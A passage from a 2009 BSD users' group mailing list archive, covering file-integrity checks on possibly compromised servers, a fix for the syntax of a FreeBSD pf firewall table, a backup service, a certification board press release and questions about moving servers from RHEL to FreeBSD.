are they willing to commit to the necessary infrastructure? George From matt at atopia.net Wed Mar 4 11:20:32 2009 From: matt at atopia.net (Matt Juszczak) Date: Wed, 4 Mar 2009 11:20:32 -0500 (EST) Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: <49adb3aa.OaTRW0SW2rM6qQmA%akosela@andykosela.com> References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <49ad985e.CV99hXLItnWIhTiS%akosela@andykosela.com> <49ADAE94.1020005@neuropunks.org> <49adb3aa.OaTRW0SW2rM6qQmA%akosela@andykosela.com> Message-ID: > Tripwire became a bloated beast nowadays. I'm using mtree(8) for > checking files integrity and it is a very good tool for such job. > > --Andy So say I wanted to check if an existing system of mine has been compromised. I already know that chkrootkit is returning nothing, but that's returning nothing with no source to compare to, so obviously there's the potential there for error. Should I compile world in /usr/src and use chkrootkit with a basedir of the compiled binaries? Or should I use mtree, and if so, suggestions on best ways? From george at ceetonetechnology.com Wed Mar 4 11:28:39 2009 From: george at ceetonetechnology.com (George Rosamond) Date: Wed, 04 Mar 2009 11:28:39 -0500 Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <49ad985e.CV99hXLItnWIhTiS%akosela@andykosela.com> <49ADAE94.1020005@neuropunks.org> <49adb3aa.OaTRW0SW2rM6qQmA%akosela@andykosela.com> Message-ID: <49AEAC37.2070701@ceetonetechnology.com> Matt Juszczak wrote: >> Tripwire became a bloated beast nowadays. I'm using mtree(8) for >> checking files integrity and it is a very good tool for such job. >> >> --Andy > > So say I wanted to check if an existing system of mine has been > compromised. I already know that chkrootkit is returning nothing, but > that's returning nothing with no source to compare to, so obviously > there's the potential there for error. > > Should I compile world in /usr/src and use chkrootkit with a basedir of > the compiled binaries? Or should I use mtree, and if so, suggestions on > best ways? > IMHO, it depends on the context. mtree is great if you're looking at a set of static files. . . clearly a dynamically generated www site will have files that can't be simply mtree'd. If you're looking at a static site, mtree can be fine for the files in questions, then use chkrootkit for a *clean* base system. If your starting point is with a questionable base system, start over. :) HTH George From akosela at andykosela.com Wed Mar 4 12:21:53 2009 From: akosela at andykosela.com (Andy Kosela) Date: Wed, 04 Mar 2009 18:21:53 +0100 Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: <49AEAC37.2070701@ceetonetechnology.com> References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <49ad985e.CV99hXLItnWIhTiS%akosela@andykosela.com> <49ADAE94.1020005@neuropunks.org> <49adb3aa.OaTRW0SW2rM6qQmA%akosela@andykosela.com> <49AEAC37.2070701@ceetonetechnology.com> Message-ID: <49aeb8b1.hxxlIJR1yad49uSH%akosela@andykosela.com> George Rosamond wrote: > Matt Juszczak wrote: > >> Tripwire became a bloated beast nowadays. I'm using mtree(8) for > >> checking files integrity and it is a very good tool for such job. > >> > >> --Andy > > > > So say I wanted to check if an existing system of mine has been > > compromised. I already know that chkrootkit is returning nothing, but > > that's returning nothing with no source to compare to, so obviously > > there's the potential there for error. > > > > Should I compile world in /usr/src and use chkrootkit with a basedir of > > the compiled binaries? Or should I use mtree, and if so, suggestions on > > best ways? > > > > IMHO, it depends on the context. > > mtree is great if you're looking at a set of static files. . . clearly a > dynamically generated www site will have files that can't be simply mtree'd. First, what is the point of checking file integrity for the *dynamically* generated set of files? Those solutions work best for base system files like /bin and /sbin binaries to see if somebody messed with them. If you didn't make a fresh specification just *before* you put the system online, then you will never know if you have been "trojan horsed". Also make sure you scan the suspect system from another highly secured machine and use mtree(8) from that machine. It is very probable that first thing an attacker would do on your system would be to change mtree(8), so that it would not work as expected. --Andy From carton at Ivy.NET Wed Mar 4 14:08:30 2009 From: carton at Ivy.NET (Miles Nordin) Date: Wed, 04 Mar 2009 14:08:30 -0500 Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: (Matt Juszczak's message of "Wed, 4 Mar 2009 11:20:32 -0500 (EST)") References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <49ad985e.CV99hXLItnWIhTiS%akosela@andykosela.com> <49ADAE94.1020005@neuropunks.org> <49adb3aa.OaTRW0SW2rM6qQmA%akosela@andykosela.com> Message-ID: >>>>> "mj" == Matt Juszczak writes: mj> say I wanted to check if an existing system of mine has mj> been compromised. I vote we should start using Vinge's word for this scenario: ``perverted''. Instead of ``the box has been compromised,'' say ``that machinery has become perverted.'' Instead of ``the worm is spreading through all our systems in that IP block really quickly,'' say ``the perversion is spreading throughout the entire cluster.'' -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 304 bytes Desc: not available URL: From nonesuch at bad-apples.org Wed Mar 4 14:18:43 2009 From: nonesuch at bad-apples.org (Mark Saad) Date: Wed, 04 Mar 2009 14:18:43 -0500 Subject: [nycbug-talk] PF question: Can I make a const table made up of lists Message-ID: <49AED413.1060200@bad-apples.org> Hello All Here is my question; when using PF can I create a const table made up of predefined lists. Here is my example it does not work I am using FreeBSD 7.1-RELEASE i386 . ============================= ext_if="bge0" int_if="bge1" #My Netgroup lists NETGROUP_SJL = "{ 10.70.123.218 10.70.123.112/28 10.70.118.192/26 10.131.146.132 }" NETGROUP_LON = "{ 10.72.241.218 10.72.241.192/28 10.72.241.32/27 }" NETGROUP_EWR = "{ 10.27.64.218 10.106.131.0/24 10.27.64.212/30 }" NETGROUP_HKG = "{ 10.168.209.218 10.168.209.40 10.168.208.100 10.168.209.192/28 }" NETGROUP_BACKUP = "{ 192.168.12.0/26 }" ISILON_SMQ = "{ 192.168.14.0/24 }" table NETGROUP_ALL const { $NETGROUP_SJL $NETGROUP_LON $NETGROUP_EWR $NETGROUP_HKG $NETGROUP_BACKUP } # Do not filter lo set skip on {lo0} # Normalize scrub in # NAT the internal network to the outside world nat on $ext_if from !($ext_if) to any -> ($ext_if) # Begin Firewall rules block in pass out pass quick on $int_if no state antispoof quick for { lo $int_if } pass in quick on $ext_if inet proto tcp from NETGROUP_ALL to ($ext_if) port 22 =============================== The issue is when I test out the rules with pfctl -vnf /etc/pf.conf I get the following error /etc/pf.conf:15: syntax error set skip on { lo0 } no IP address found for NETGROUP_ALL /etc/pf.conf:33: could not parse host specification % Any ideas ? -- ]Mark Saad[ mark at bad-apples.org () ascii ribbon campaign - against html e-mail /\ www.asciiribbon.org - against proprietary attachments From george at ceetonetechnology.com Wed Mar 4 14:45:23 2009 From: george at ceetonetechnology.com (George Rosamond) Date: Wed, 04 Mar 2009 14:45:23 -0500 Subject: [nycbug-talk] PF question: Can I make a const table made up of lists In-Reply-To: <49AED413.1060200@bad-apples.org> References: <49AED413.1060200@bad-apples.org> Message-ID: <49AEDA53.4090709@ceetonetechnology.com> Mark Saad wrote: > Hello All > Here is my question; when using PF can I create a const table made > up of predefined lists. > Here is my example it does not work I am using FreeBSD 7.1-RELEASE i386 . > > ============================= > > ext_if="bge0" > int_if="bge1" > > #My Netgroup lists > NETGROUP_SJL = "{ 10.70.123.218 10.70.123.112/28 10.70.118.192/26 > 10.131.146.132 }" > NETGROUP_LON = "{ 10.72.241.218 10.72.241.192/28 10.72.241.32/27 }" > NETGROUP_EWR = "{ 10.27.64.218 10.106.131.0/24 10.27.64.212/30 }" > NETGROUP_HKG = "{ 10.168.209.218 10.168.209.40 10.168.208.100 > 10.168.209.192/28 }" > NETGROUP_BACKUP = "{ 192.168.12.0/26 }" > ISILON_SMQ = "{ 192.168.14.0/24 }" > > table NETGROUP_ALL const { $NETGROUP_SJL $NETGROUP_LON $NETGROUP_EWR > $NETGROUP_HKG $NETGROUP_BACKUP } > > # Do not filter lo > set skip on {lo0} > > # Normalize > scrub in > > # NAT the internal network to the outside world > nat on $ext_if from !($ext_if) to any -> ($ext_if) > > # Begin Firewall rules > block in > pass out > > pass quick on $int_if no state > antispoof quick for { lo $int_if } > > pass in quick on $ext_if inet proto tcp from NETGROUP_ALL to ($ext_if) > port 22 > > =============================== > > > The issue is when I test out the rules with pfctl -vnf /etc/pf.conf I > get the following error > > /etc/pf.conf:15: syntax error > set skip on { lo0 } > no IP address found for NETGROUP_ALL > /etc/pf.conf:33: could not parse host specification > % > > Any ideas ? > And I guess the question is, does pf support nested groups since NETGROUP_ALL is a nested group (can't count lines :). . which i believe it doesn't. g From george at ceetonetechnology.com Wed Mar 4 14:47:57 2009 From: george at ceetonetechnology.com (George Rosamond) Date: Wed, 04 Mar 2009 14:47:57 -0500 Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <49ad985e.CV99hXLItnWIhTiS%akosela@andykosela.com> <49ADAE94.1020005@neuropunks.org> <49adb3aa.OaTRW0SW2rM6qQmA%akosela@andykosela.com> Message-ID: <49AEDAED.5020809@ceetonetechnology.com> Miles Nordin wrote: >>>>>> "mj" == Matt Juszczak writes: > > mj> say I wanted to check if an existing system of mine has > mj> been compromised. > > I vote we should start using Vinge's word for this scenario: > ``perverted''. Instead of ``the box has been compromised,'' say > ``that machinery has become perverted.'' > > Instead of ``the worm is spreading through all our systems in that IP > block really quickly,'' say ``the perversion is spreading throughout > the entire cluster.'' This guy? http://en.wikipedia.org/wiki/Vernor_Vinge +1 miles, although 'perverted' already gets overused, IMHO. g From george at ceetonetechnology.com Wed Mar 4 13:47:38 2009 From: george at ceetonetechnology.com (George Rosamond) Date: Wed, 04 Mar 2009 13:47:38 -0500 Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: <49aeb8b1.hxxlIJR1yad49uSH%akosela@andykosela.com> References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <49ad985e.CV99hXLItnWIhTiS%akosela@andykosela.com> <49ADAE94.1020005@neuropunks.org> <49adb3aa.OaTRW0SW2rM6qQmA%akosela@andykosela.com> <49AEAC37.2070701@ceetonetechnology.com> <49aeb8b1.hxxlIJR1yad49uSH%akosela@andykosela.com> Message-ID: <49AECCCA.9020904@ceetonetechnology.com> Andy Kosela wrote: > George Rosamond wrote: > >> Matt Juszczak wrote: >>>> Tripwire became a bloated beast nowadays. I'm using mtree(8) for >>>> checking files integrity and it is a very good tool for such job. >>>> >>>> --Andy >>> So say I wanted to check if an existing system of mine has been >>> compromised. I already know that chkrootkit is returning nothing, but >>> that's returning nothing with no source to compare to, so obviously >>> there's the potential there for error. >>> >>> Should I compile world in /usr/src and use chkrootkit with a basedir of >>> the compiled binaries? Or should I use mtree, and if so, suggestions on >>> best ways? >>> >> IMHO, it depends on the context. >> >> mtree is great if you're looking at a set of static files. . . clearly a >> dynamically generated www site will have files that can't be simply mtree'd. > > First, what is the point of checking file integrity for the > *dynamically* generated set of files? Err. . that was my point, if made unclear. . . dynamically generated files are a bit of a hassle to mtree :) > > Those solutions work best for base system files like /bin and /sbin > binaries to see if somebody messed with them. If you didn't make a > fresh specification just *before* you put the system online, then you > will never know if you have been "trojan horsed". Also make sure you > scan the suspect system from another highly secured machine and use > mtree(8) from that machine. It is very probable that first thing an > attacker would do on your system would be to change mtree(8), so that it > would not work as expected. > Of course. . . And the most effective way of doing such an mtree is to have it done remotely . . . depending on the context. Maybe from outside a chroot, or (ike don't punch me), from the host to a FreeBSD jail. If it's just static www content, it can be done remotely with wget. It all depends on the context. . . checksum'g: 1. base system? without a FreeBSD jail or full system remote access, you're right, it's a bit suspect in results. 2. dynamic www content: good luck outside of the static files g From max at neuropunks.org Wed Mar 4 14:35:13 2009 From: max at neuropunks.org (Max Gribov) Date: Wed, 04 Mar 2009 14:35:13 -0500 Subject: [nycbug-talk] PF question: Can I make a const table made up of lists In-Reply-To: <49AED413.1060200@bad-apples.org> References: <49AED413.1060200@bad-apples.org> Message-ID: <49AED7F1.5070903@neuropunks.org> Mark Saad wrote: > Hello All > Here is my question; when using PF can I create a const table made > up of predefined lists. > table persist file "/etc/sometable" sometable file would have one ip per line.. > Here is my example it does not work I am using FreeBSD 7.1-RELEASE i386 . > > ============================= > > ext_if="bge0" > int_if="bge1" > > #My Netgroup lists > NETGROUP_SJL = "{ 10.70.123.218 10.70.123.112/28 10.70.118.192/26 > 10.131.146.132 }" > NETGROUP_LON = "{ 10.72.241.218 10.72.241.192/28 10.72.241.32/27 }" > NETGROUP_EWR = "{ 10.27.64.218 10.106.131.0/24 10.27.64.212/30 }" > NETGROUP_HKG = "{ 10.168.209.218 10.168.209.40 10.168.208.100 > 10.168.209.192/28 }" > NETGROUP_BACKUP = "{ 192.168.12.0/26 }" > ISILON_SMQ = "{ 192.168.14.0/24 }" > > table NETGROUP_ALL const { $NETGROUP_SJL $NETGROUP_LON $NETGROUP_EWR > $NETGROUP_HKG $NETGROUP_BACKUP } > > # Do not filter lo > set skip on {lo0} > > # Normalize > scrub in > > # NAT the internal network to the outside world > nat on $ext_if from !($ext_if) to any -> ($ext_if) > > # Begin Firewall rules > block in > pass out > > pass quick on $int_if no state > antispoof quick for { lo $int_if } > > pass in quick on $ext_if inet proto tcp from NETGROUP_ALL to ($ext_if) > port 22 > > =============================== > > > The issue is when I test out the rules with pfctl -vnf /etc/pf.conf I > get the following error > > /etc/pf.conf:15: syntax error > set skip on { lo0 } > no IP address found for NETGROUP_ALL > /etc/pf.conf:33: could not parse host specification > % > > Any ideas ? > > From nonesuch at bad-apples.org Wed Mar 4 15:01:24 2009 From: nonesuch at bad-apples.org (Mark Saad) Date: Wed, 04 Mar 2009 15:01:24 -0500 Subject: [nycbug-talk] PF question: Can I make a const table made up of lists In-Reply-To: <49AED7F1.5070903@neuropunks.org> References: <49AED413.1060200@bad-apples.org> <49AED7F1.5070903@neuropunks.org> Message-ID: <49AEDE14.2020907@bad-apples.org> Max Gribov wrote: > Mark Saad wrote: >> Hello All >> Here is my question; when using PF can I create a const table >> made up of predefined lists. >> > > table persist file "/etc/sometable" > > sometable file would have one ip per line.. > > > Could this also be done with a list of lists ? IE: NETGROUP_ALL = NETGROUP_SJL NETGROUP_LON NETGROUP_EWR NETGROUP_HKG NETGROUP_BACKUP >> Here is my example it does not work I am using FreeBSD 7.1-RELEASE >> i386 . >> >> ============================= >> >> ext_if="bge0" >> int_if="bge1" >> >> #My Netgroup lists >> NETGROUP_SJL = "{ 10.70.123.218 10.70.123.112/28 10.70.118.192/26 >> 10.131.146.132 }" >> NETGROUP_LON = "{ 10.72.241.218 10.72.241.192/28 10.72.241.32/27 }" >> NETGROUP_EWR = "{ 10.27.64.218 10.106.131.0/24 10.27.64.212/30 }" >> NETGROUP_HKG = "{ 10.168.209.218 10.168.209.40 10.168.208.100 >> 10.168.209.192/28 }" >> NETGROUP_BACKUP = "{ 192.168.12.0/26 }" >> ISILON_SMQ = "{ 192.168.14.0/24 }" >> >> table NETGROUP_ALL const { $NETGROUP_SJL $NETGROUP_LON $NETGROUP_EWR >> $NETGROUP_HKG $NETGROUP_BACKUP } >> >> # Do not filter lo >> set skip on {lo0} >> >> # Normalize >> scrub in >> >> # NAT the internal network to the outside world >> nat on $ext_if from !($ext_if) to any -> ($ext_if) >> >> # Begin Firewall rules >> block in >> pass out >> >> pass quick on $int_if no state >> antispoof quick for { lo $int_if } >> >> pass in quick on $ext_if inet proto tcp from NETGROUP_ALL to >> ($ext_if) port 22 >> >> =============================== >> >> >> The issue is when I test out the rules with pfctl -vnf /etc/pf.conf I >> get the following error >> >> /etc/pf.conf:15: syntax error >> set skip on { lo0 } >> no IP address found for NETGROUP_ALL >> /etc/pf.conf:33: could not parse host specification >> % >> >> Any ideas ? >> >> > -- ]Mark Saad[ mark at bad-apples.org () ascii ribbon campaign - against html e-mail /\ www.asciiribbon.org - against proprietary attachments From bonsaime at gmail.com Wed Mar 4 15:15:45 2009 From: bonsaime at gmail.com (Jesse Callaway) Date: Wed, 4 Mar 2009 15:15:45 -0500 Subject: [nycbug-talk] PF question: Can I make a const table made up of lists In-Reply-To: <49AEDE14.2020907@bad-apples.org> References: <49AED413.1060200@bad-apples.org> <49AED7F1.5070903@neuropunks.org> <49AEDE14.2020907@bad-apples.org> Message-ID: On Wed, Mar 4, 2009 at 3:01 PM, Mark Saad wrote: > Max Gribov wrote: >> Mark Saad wrote: >>> Hello All >>> ? ?Here is my question; when using PF ?can I create a const table >>> made up of predefined lists. >>> >> >> table persist file "/etc/sometable" >> >> sometable file would have one ip per line.. >> >> >> > Could this also be done with a list of lists ? > > ?IE: NETGROUP_ALL = NETGROUP_SJL NETGROUP_LON NETGROUP_EWR NETGROUP_HKG > NETGROUP_BACKUP > >>> Here is my example it does not work I am using FreeBSD 7.1-RELEASE >>> i386 . >>> >>> ============================= >>> >>> ext_if="bge0" >>> int_if="bge1" >>> >>> #My Netgroup lists >>> NETGROUP_SJL ?= "{ 10.70.123.218 10.70.123.112/28 10.70.118.192/26 >>> 10.131.146.132 }" >>> NETGROUP_LON ?= "{ 10.72.241.218 10.72.241.192/28 10.72.241.32/27 }" >>> NETGROUP_EWR ?= "{ 10.27.64.218 10.106.131.0/24 10.27.64.212/30 }" >>> NETGROUP_HKG ?= "{ 10.168.209.218 10.168.209.40 10.168.208.100 >>> 10.168.209.192/28 }" >>> NETGROUP_BACKUP = "{ 192.168.12.0/26 }" >>> ISILON_SMQ = "{ 192.168.14.0/24 }" >>> >>> table NETGROUP_ALL const { $NETGROUP_SJL $NETGROUP_LON $NETGROUP_EWR >>> $NETGROUP_HKG $NETGROUP_BACKUP } >>> >>> # Do not filter lo >>> set skip on {lo0} >>> >>> # Normalize >>> scrub in >>> >>> # NAT the internal network to the outside world >>> nat on $ext_if from !($ext_if) to any -> ($ext_if) >>> >>> # Begin Firewall rules >>> block in >>> pass out >>> >>> pass quick on $int_if no state >>> antispoof quick for { lo $int_if } >>> >>> pass in quick on $ext_if inet proto tcp from NETGROUP_ALL to >>> ($ext_if) port 22 >>> >>> =============================== >>> >>> >>> The issue is when I test out the rules with pfctl -vnf /etc/pf.conf I >>> get the following error >>> >>> /etc/pf.conf:15: syntax error >>> set skip on { lo0 } >>> no IP address found for NETGROUP_ALL >>> /etc/pf.conf:33: could not parse host specification >>> % >>> >>> Any ideas ? >>> >>> >> > > > -- > ]Mark Saad[ > mark at bad-apples.org > > () ?ascii ribbon campaign - against html e-mail > /\ ?www.asciiribbon.org ? - against proprietary attachments > > _______________________________________________ > talk mailing list > talk at lists.nycbug.org > http://lists.nycbug.org/mailman/listinfo/talk > Hi Mark, Try this guy out. pfctl -n -f /etc/pf.conf If it works, then load up the ruleset and then have pfctl dump the rules onto the screen. If NETGROUP_ALL looks like it should, then success. If not, then it's back to the drawing board. From okan at demirmen.com Wed Mar 4 15:48:11 2009 From: okan at demirmen.com (Okan Demirmen) Date: Wed, 4 Mar 2009 15:48:11 -0500 Subject: [nycbug-talk] PF question: Can I make a const table made up of lists In-Reply-To: <49AED413.1060200@bad-apples.org> References: <49AED413.1060200@bad-apples.org> Message-ID: <20090304204811.GI27375@clam.khaoz.org> On Wed 2009.03.04 at 14:18 -0500, Mark Saad wrote: [snip] > table NETGROUP_ALL const { $NETGROUP_SJL $NETGROUP_LON $NETGROUP_EWR > $NETGROUP_HKG $NETGROUP_BACKUP } need <> around NETGROUP_ALL. [snip] > pass in quick on $ext_if inet proto tcp from NETGROUP_ALL to ($ext_if) > port 22 again, need <> around NETGROUP_ALL. From nonesuch at bad-apples.org Wed Mar 4 16:06:54 2009 From: nonesuch at bad-apples.org (Mark Saad) Date: Wed, 04 Mar 2009 16:06:54 -0500 Subject: [nycbug-talk] PF question: Can I make a const table made up of lists In-Reply-To: <20090304204811.GI27375@clam.khaoz.org> References: <49AED413.1060200@bad-apples.org> <20090304204811.GI27375@clam.khaoz.org> Message-ID: <49AEED6E.10305@bad-apples.org> Okan Wins !!! it was the pesky "<>" Okan Demirmen wrote: > On Wed 2009.03.04 at 14:18 -0500, Mark Saad wrote: > > [snip] > > >> table NETGROUP_ALL const { $NETGROUP_SJL $NETGROUP_LON $NETGROUP_EWR >> $NETGROUP_HKG $NETGROUP_BACKUP } >> > > need <> around NETGROUP_ALL. > > [snip] > > >> pass in quick on $ext_if inet proto tcp from NETGROUP_ALL to ($ext_if) >> port 22 >> > > again, need <> around NETGROUP_ALL. > _______________________________________________ > talk mailing list > talk at lists.nycbug.org > http://lists.nycbug.org/mailman/listinfo/talk > -- ]Mark Saad[ mark at bad-apples.org () ascii ribbon campaign - against html e-mail /\ www.asciiribbon.org - against proprietary attachments From akosela at andykosela.com Wed Mar 4 17:11:15 2009 From: akosela at andykosela.com (Andy Kosela) Date: Wed, 04 Mar 2009 23:11:15 +0100 Subject: [nycbug-talk] Searching for suspect PHP files... In-Reply-To: <49AEDAED.5020809@ceetonetechnology.com> References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <49ad985e.CV99hXLItnWIhTiS%akosela@andykosela.com> <49ADAE94.1020005@neuropunks.org> <49adb3aa.OaTRW0SW2rM6qQmA%akosela@andykosela.com> <49AEDAED.5020809@ceetonetechnology.com> Message-ID: <49aefc83.2/bqRx383NESjCiK%akosela@andykosela.com> George Rosamond wrote: > Miles Nordin wrote: > >>>>>> "mj" == Matt Juszczak writes: > > > > mj> say I wanted to check if an existing system of mine has > > mj> been compromised. > > > > I vote we should start using Vinge's word for this scenario: > > ``perverted''. Instead of ``the box has been compromised,'' say > > ``that machinery has become perverted.'' > > > > Instead of ``the worm is spreading through all our systems in that IP > > block really quickly,'' say ``the perversion is spreading throughout > > the entire cluster.'' > > This guy? > > http://en.wikipedia.org/wiki/Vernor_Vinge > Vernor Vinge is reminding me of Stanislaw Lem, author of Solaris. Both are/were very advanced in their ideas and thinking. --Andy From nikolai at fetissov.org Thu Mar 5 12:20:20 2009 From: nikolai at fetissov.org (nikolai) Date: Thu, 5 Mar 2009 12:20:20 -0500 (EST) Subject: [nycbug-talk] March 2009 meeting audio Message-ID: <95bf3ac3e02fb1bf8a257e46e420e035.squirrel@geekisp.com> Folks, Audio of Tom Limoncelli presentation is available at http://www.fetissov.org/public/nycbug/nycbug-03-04-09.mp3 Cheers, -- Nikolai From lists at stringsutils.com Thu Mar 5 17:28:27 2009 From: lists at stringsutils.com (Francisco Reyes) Date: Thu, 05 Mar 2009 17:28:27 -0500 Subject: [nycbug-talk] Remote backup services References: <28725454-1236123823-cardhu_decombobulator_blackberry.rim.net-218067971-@bxe1061.bisx.prod.on.blackberry> Message-ID: Raj Goel writes: Only works on *nix.... check http://tarsnap.com Using it on 4 machines with several more planned. If you do go with it... just remember to keep copies of the keys in separate machines. Otherwise if the machine dies, you loose all your data and will not be able to access the data on the service. Tarsnap is a service by Colin Percival the current FreeBSD security officer. From george at ceetonetechnology.com Fri Mar 6 00:55:38 2009 From: george at ceetonetechnology.com (George Rosamond) Date: Fri, 06 Mar 2009 00:55:38 -0500 Subject: [nycbug-talk] BSD Cert press release Message-ID: <49B0BADA.30809@ceetonetechnology.com> For anyone interested. . . * * * News and Announcements March 4, 2009 - Nominations Open for 3 Board of Directors Positions Press Release English Nominations Open for 3 Board of Directors Positions The BSD Certification Group will be accepting nominations for three Board of Directors positions starting March 4. These positions are for a two year term starting at the end of the election process. Nominees can be anyone from the general BSD community as well as any interested organization or company. The board of directors will be expanded to five members with Dru Lavigne and Jim Brown continuing their terms until 2010. Responsibilities may include participating in monthly meetings and helping set the direction of the BSD Certification Group. Nominations may be emailed until April 3, 2009. Please consider carbon copying the person being nominated on the email. (nominations at bsdcertification at org) The non-voting chair, Phil Nelson from the NetBSD community, will acknowledge receipt of each nomination and confirm the nominees. The names of the confirmed nominees along with the number of nominations received by each will be published by mid April. The eligible BSDCG members will hold an internal vote and the public announcement of the new Directors should be announced by mid May, 2009. For more details, see the BSDCG bylaws. (http://www.bsdcertification.org/BSDCG/bylaws.html) About the BSD Certification Group The BSD Certification Group (BSDCG) is a non-profit organization committed to creating and maintaining a global certification standard for system administration on BSD based operating systems. The BSDCG works with the BSD and sysadmin communities in order to provide a practical and relevant certification. From zippy1981 at gmail.com Fri Mar 6 03:07:55 2009 From: zippy1981 at gmail.com (Justin Dearing) Date: Fri, 6 Mar 2009 03:07:55 -0500 Subject: [nycbug-talk] Fwd: [Lilug] Next LUGSB Meeting, and LILUG Meeting with ESR! In-Reply-To: References: Message-ID: <5458db3c0903060007j3409fe68y88bb3d37f7e733f3@mail.gmail.com> Guys, ESR will be at Suny Farmingdale March 10th at 8pm. Regards, Justin Dearing ---------- Forwarded message ---------- From: Benjamin Kudria Date: Thu, Mar 5, 2009 at 3:09 AM Subject: [Lilug] Next LUGSB Meeting, and LILUG Meeting with ESR! To: Linux Users Group at Stony Brook , Jonathan Dahan , lilug at lilug.org Hi, all, Some announcements: The next LUGSB meeting will be next Thursday, the 12th, at 5:30 PM, in room 1441. Jonathan, our VP, will be giving a presentation: "Hacking the XBox with Linux", with a real live XBox in attendance. The flyer, as usual, can be found at [1] , and, as usual, help in posting it is greatly appreciated. I'd also like to let everyone know that LILUG [2], the Long Island LUG, is having a meeting on the 10th, at Farmingdale University (150 Whitman Hall), at 8PM. Eric S. Raymond [3], noted open source software advocate, will be speaking with the audience at the meeting. I'd like to organize a carpool to Farmingdale, I'll try to send out another email about that soon. I've also put together a poster for this event, at [4], posting it would also be a ... good thing. (Mandatory flyer posting guidelines: post on bulleting boards (or, walls), not on doors or windows. Thanks!) See you there! Benjamin Kudria LUGSB President 1: http://ben.kudria.net/pub/next-meeting-flyer.pdf 2: http://lilug.org 3: http://en.wikipedia.org/wiki/Eric_S_Raymond 4: http://ben.kudria.net/pub/lilug-esr-flyer.pdf -- http://ben.kudria.net | Jabber: ben at kudria.net _______________________________________________ Lilug mailing list Lilug at lilug.org http://lists.lilug.org/listinfo.cgi/lilug-lilug.org -------------- next part -------------- An HTML attachment was scrubbed... URL: From matt at atopia.net Fri Mar 6 11:19:00 2009 From: matt at atopia.net (Matt Juszczak) Date: Fri, 6 Mar 2009 11:19:00 -0500 (EST) Subject: [nycbug-talk] Switch to FreeBSD from RHEL Message-ID: I'm currently in the middle of a data center migration project and we're considering switching to my long time favorite OS, FreeBSD. Luckily, the higher ups are also FreeBSD fans, but its the higher ups of the higher ups that need convincing. While I personally feel that FreeBSD is superior in out of box security, ease of configuration (rc.conf file, etc.), packages (ports system / pkg_create vs. rpm), stability and performance, etc., my opinion is probably very biased. I just have a few things to ask everyone, and I'd be hoping for some documentation to back it up if possible. 1) FreeBSD vs. Linux - I passed on the single document linked on bsdjobs.net that outlines the differences between the two, but I was hoping for something more recent and solid. Any links? Like I said, I'm sold - it's convincing others. 2) Centralized management - the dream of starting from the ground up is here for me. I'd like to definitely use LDAP & SVN for centralized authentication and centralized code versioning. Also, internal DNS (not split horizon). In the possibilities but not yet finalized category include CF Engine (we'll need a way to centrally manage server config files and centrally updated servers - if you have alternatives to CF Engine, perhaps something that works better for a smaller (50 server) setup, let me know!). I'd also like to know how everyone does centralized authorization - still using LDAP, with groups, and sudo with roles, or something else? 3) Security Auditing - here's a big one, too. chkrootkit? mtree? Starting early on, I'd like to get a good security status impression of these 50 servers from day 1. 4) LAMP stack support with FreeBSD: A) Apache - performance comparisons? In the past, I've seen a performance gain overall switching web's to FreeBSD from Linux. Does this still hold true with apache_2.x? B) MySQL - In the past, I saw a performance *drop* when switching from Linux to FreeBSD. pthread support enabled helped, but at the time it was only available for 32-bit. Some recent documentation shows that FreeBSD 7.x with MysQL 5.0.x works well, while potentially 5.1.x may not. Does anyone have any comments on this one? (this is probably our largest fear). Of course, we'll do our own benchmarking before we move :) But this is just pre-planning questions. C) PHP - any performance differences? D) Memcache - any performance differences? I'd say those are most of my questions for now. Thanks everyone! -Matt From skreuzer at exit2shell.com Fri Mar 6 12:08:16 2009 From: skreuzer at exit2shell.com (Steven Kreuzer) Date: Fri, 6 Mar 2009 12:08:16 -0500 Subject: [nycbug-talk] Switch to FreeBSD from RHEL In-Reply-To: References: Message-ID: <7211AF80-6E9A-4D76-B6BE-77421D717CFD@exit2shell.com> On Mar 6, 2009, at 11:19 AM, Matt Juszczak wrote: > I'm currently in the middle of a data center migration project and > we're > considering switching to my long time favorite OS, FreeBSD. > Luckily, the > higher ups are also FreeBSD fans, but its the higher ups of the > higher ups > that need convincing. > > While I personally feel that FreeBSD is superior in out of box > security, > ease of configuration (rc.conf file, etc.), packages (ports system / > pkg_create vs. rpm), stability and performance, etc., my opinion is > probably very biased. I just have a few things to ask everyone, and > I'd > be hoping for some documentation to back it up if possible. > > 1) FreeBSD vs. Linux - I passed on the single document linked on > bsdjobs.net that outlines the differences between the two, but I was > hoping for something more recent and solid. Any links? Like I > said, I'm > sold - it's convincing others. http://www.over-yonder.net/~fullermd/rants/bsd4linux/bsd4linux1.php - SNIP - > A) Apache - performance comparisons? In the past, I've seen a > performance > gain overall switching web's to FreeBSD from Linux. Does this still > hold > true with apache_2.x? Take a look at accept_filter(9) "The utility of accf_http is such that a server will not have to context switch several times before performing the initial parsing of the request. This effectively reduces the amount of required CPU utilization to handle incoming requests by keeping active processes in preforking servers such as Apache low and reducing the size of the file descriptor set that needs to be managed by interfaces such as select(), poll() or kevent() based servers." For whats its worth, during the 90's porn boom, most of the sites hosting adult content ran FreeBSD because it was able to handle large amounts of traffic. However, Getting web sites to scale depends on much more then the underlying operating system. Its something that I could talk about for hours without mentioning the OS once. > > B) MySQL - In the past, I saw a performance *drop* when switching from > Linux to FreeBSD. pthread support enabled helped, but at the time > it was > only available for 32-bit. Some recent documentation shows that > FreeBSD > 